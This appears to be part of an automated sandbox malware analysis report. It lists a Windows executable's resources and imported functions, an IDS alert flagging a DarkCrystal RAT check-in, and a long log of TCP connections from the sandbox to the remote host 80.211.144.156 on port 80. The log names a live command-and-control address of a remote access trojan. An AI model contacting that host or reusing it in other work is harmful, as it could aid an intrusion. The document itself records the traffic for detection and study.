RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-31T09:32:13.286244+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49732 | 80 | 192.168.2.4 | 80.211.144.156
                                                        Aug 31, 2024 09:32:18.292691946 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.292800903 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.297528982 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.645994902 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:18.650938034 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.650953054 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.650960922 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:18.978549957 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.020898104 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.109905005 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.161520004 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.241640091 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.242639065 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.247040987 CEST804974280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.247088909 CEST4974280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.247430086 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.247488022 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.247610092 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.252341032 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.396853924 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.402965069 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.403347969 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.403486013 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.403630018 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.410731077 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.453237057 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.532488108 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.537293911 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.537378073 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.537461042 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.542246103 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.712869883 CEST804974380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.712937117 CEST4974380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.755436897 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.760318995 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.760385990 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.895970106 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:19.900971889 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.900981903 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:19.900989056 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.070568085 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.114686966 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.225775957 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.270908117 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.275399923 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.317775965 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.422074080 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.474010944 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.549632072 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.549637079 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.550493956 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.554970026 CEST804974580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.555033922 CEST4974580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.555161953 CEST804974480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.555212975 CEST4974480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.555557966 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.555624962 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.555720091 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.560529947 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.911768913 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:20.916698933 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.916712046 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:20.916721106 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.220643044 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.270895958 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.348033905 CEST804974680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.395935059 CEST4974680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.491704941 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.496522903 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.497648954 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.497766018 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.502593040 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.849148989 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:21.856080055 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.856092930 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:21.856200933 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.181421041 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.224118948 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.315757036 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.364784002 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.440026045 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.440772057 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.445174932 CEST804974780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.445235014 CEST4974780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.445566893 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.445640087 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.445745945 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.450500965 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.802301884 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:22.807461977 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.807476044 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:22.807487965 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.110151052 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.161648035 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.239974022 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.286516905 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.362302065 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.363048077 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.367333889 CEST804974880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.367398024 CEST4974880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.367814064 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.367877007 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.367980957 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.372909069 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.724165916 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:23.729547024 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.729561090 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:23.729571104 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.041440010 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.083440065 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.222552061 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.270908117 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.348334074 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.348965883 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.354825020 CEST804974980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.354871035 CEST4974980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.354955912 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.355011940 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.355138063 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.361217976 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.708517075 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:24.713593960 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.713606119 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:24.713618994 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.028357983 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.067795038 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.156081915 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.208412886 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.282738924 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.283377886 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.287646055 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.287920952 CEST804975080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.287981987 CEST4975080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.288208008 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.289299011 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.289416075 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.292460918 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.292520046 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.292602062 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.294292927 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.297399998 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.646012068 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.646012068 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:25.650962114 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.650973082 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.650981903 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.651233912 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.651263952 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.954807997 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:25.981359959 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.005398989 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.036546946 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.116364002 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.119255066 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.124761105 CEST804975180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.124810934 CEST4975180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.161569118 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.234534979 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.235151052 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.239590883 CEST804975280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.239671946 CEST4975280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.242121935 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.242424011 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.242513895 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.250432968 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.599169970 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:26.604114056 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.604131937 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.604170084 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.919713974 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:26.974036932 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:27.121907949 CEST804975380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.177155972 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:27.236813068 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:27.241760015 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.241821051 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:27.241972923 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:27.246782064 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.599133968 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:27.604054928 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.604069948 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.604079962 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.907552004 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:27.958415985 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.039904118 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.083550930 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.167490005 CEST4975380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.171482086 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.172296047 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.176886082 CEST804975480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.176956892 CEST4975480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.177194118 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.177262068 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.177366018 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.182173014 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.536676884 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.541678905 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.541691065 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.541699886 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.859024048 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:28.911567926 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:28.991667986 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.036540031 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.110491991 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.111093998 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.115636110 CEST804975580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.115794897 CEST4975580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.115881920 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.115945101 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.116153002 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.120928049 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.474160910 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.479096889 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.479109049 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.479115963 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.798165083 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.849055052 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:29.931833029 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:29.974056005 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:30.050712109 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:30.051537037 CEST4975780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:30.055932999 CEST804975680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:30.055998087 CEST4975680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:30.056338072 CEST804975780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:45.645780087 CEST804977580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:45.645857096 CEST4977580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:45.646051884 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:45.646112919 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:45.646215916 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:45.650965929 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.005579948 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.010509968 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.010524988 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.010533094 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.391247988 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.442904949 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.507901907 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.549699068 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.625751019 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.626255989 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.631062984 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.631073952 CEST804977680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.631139040 CEST4977680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.631247044 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.631247044 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.636075974 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.989859104 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:46.994765043 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.994779110 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:46.994788885 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.326651096 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.380440950 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.465567112 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.520937920 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.579547882 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.580167055 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.584665060 CEST804977780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.584732056 CEST4977780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.584922075 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.585077047 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.585197926 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.589900017 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.942960024 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:47.948427916 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.948441982 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:47.948447943 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:48.248292923 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:48.302207947 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:48.375761032 CEST804977880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:48.427194118 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:48.496648073 CEST4977480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:48.504229069 CEST4977880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:48.504230976 CEST4977980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:32:48.509090900 CEST804977980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:32:48.509157896 CEST4977980192.168.2.480.211.144.156
